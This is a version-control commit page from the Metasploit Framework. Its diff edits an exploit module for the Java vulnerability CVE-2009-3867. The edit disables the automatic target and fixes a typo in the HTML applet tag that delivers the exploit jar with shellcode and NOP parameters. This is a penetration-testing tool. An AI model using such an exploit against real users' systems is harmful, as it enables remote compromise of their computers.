fix typo, remove automatic target
git-svn-id: file:///home/svn/framework3/trunk@7834 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
ea0a1eea7d
commit
f1a975a14e
|
@ -59,12 +59,17 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'J2SE 1.6_16 Automatic',
|
||||
=begin
|
||||
|
||||
No automatic targetting for now ...
|
||||
|
||||
[ 'J2SE 1.6_16 Automatic',
|
||||
{
|
||||
'Platform' => ['win', 'linux', 'osx'],
|
||||
'Arch' => [ARCH_X86, ARCH_PPC]
|
||||
}
|
||||
],
|
||||
=end
|
||||
[ 'J2SE 1.6_16 on Windows x86',
|
||||
{
|
||||
'Platform' => 'win',
|
||||
|
@ -164,7 +169,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
<!-- <meta http-equiv=refresh content=10 /> -->
|
||||
</head>
|
||||
<body>
|
||||
<applet width='100%' height='100%' code='AppletX' archive='CVE-2009-3867.jar'5>
|
||||
<applet width='100%' height='100%' code='AppletX' archive='CVE-2009-3867.jar'>
|
||||
<param name='sc' value='SCODE' />
|
||||
<param name='np' value='NOPS' />
|
||||
</applet>
|
||||
|
|
Loading…
Reference in New Issue